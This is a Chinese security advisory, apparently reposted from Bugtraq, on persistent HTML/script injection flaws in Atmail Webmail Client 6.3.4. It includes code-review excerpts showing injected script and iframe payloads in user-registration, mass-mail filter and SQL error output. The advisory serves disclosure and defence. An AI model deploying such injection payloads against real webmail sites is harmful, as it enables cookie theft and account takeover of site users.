发布日期:2012-01-09
更新日期:2012-01-10
受影响系统:
@Mail Atmail Webmail Client 6.3.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51313
Atmail是商业化Linux消息传送平台提供者。
Atmail Webmail Client将用户提供的输入用作动态内容之前没有正确过滤,在实现上存在多个HTML注入漏洞,成功利用可允许攻击者在受影响站点的用户浏览器中执行任意HTML和脚本代码,窃取Cookie身份验证凭证或控制站点外观。
<*来源:Benjamin Kunz Mejri
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Benjamin Kunz Mejri ()提供了如下测试方法:
Code Review: Exception Handling of the Application Service
<div>
?????SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual
that
corresponds to your MySQL server version for the right syntax to use near '"><EXECUTION OF MALICIOUS SCRIPT CODE")'
<="" where'="" at="" line="" 1="" <h2="">Application error</h2>
<h3>Exception information:<
/h3>
<p>
<b>Message:<br></b> SQLSTATE[42000]: Syntax error or access
violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the
right syntax to use near '"><iframe src=https://www.linuxidc.com/Linux/2012-01/a onload=https://www.linuxidc.com/Linux/2012-01/alert("PERSISTENT") < where' at line 1
</p>
<strong>Thrown in:</strong> /usr/local/atmail/webmail/library/Zend/Db/Statement/Pdo.php, Line #:234, Code #: 42000
<h3>Stack trace:</h3>
<pre>#0 /usr/local/atmail/webmail/library/Zend/Db/Statement.php(300):
Zend_Db_Statement_Pdo->_execute(Array)
#1 /usr/local/atmail/webmail/library/Zend/Db/Adapter/Abstract.php(468): Zend_Db_Statement->execute(Array)
#2 /usr/local/atmail/webmail/library/Zend/Db/Adapter/Pdo/Abstract.php(238): Zend_Db_Adapter_Abstract->query('select
count(id...', Array)
#3 /usr/local/atmail/webmail/library/Zend/Db/Adapter/Abstract.php(799): Zend_Db_Adapter_Pdo_Abstract->query('select
count(id...', Array)
#4/usr/local/atmail/webmail/application/models/api.php(3270): Zend ... ...
Code Review: Adding New User - Userverwaltung or User Registration
<tr>
<td>
Firstname </td>
<td>
<input maxlength="128"
value="<script>EXECUTION OF MALICIOUS SCRIPT CODE)</script>">
</td>
</tr>
<tr>
<td>
Lastname </td>
<td>
<input maxlength="128" value="Last Name">
</td>
</tr>
Code Review: Mass Mail - Output
<td>Filter by domain:</td>
<td>
<input value=""
<script>EXECUTION OF MALICIOUS SCRIPT CODE)</script>" type="text">
<small>Specify a domain or email to filter results</small>
</td>
<td>
</td>
</tr>
</tbody></table>
建议:
--------------------------------------------------------------------------------
厂商补丁:
@Mail
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: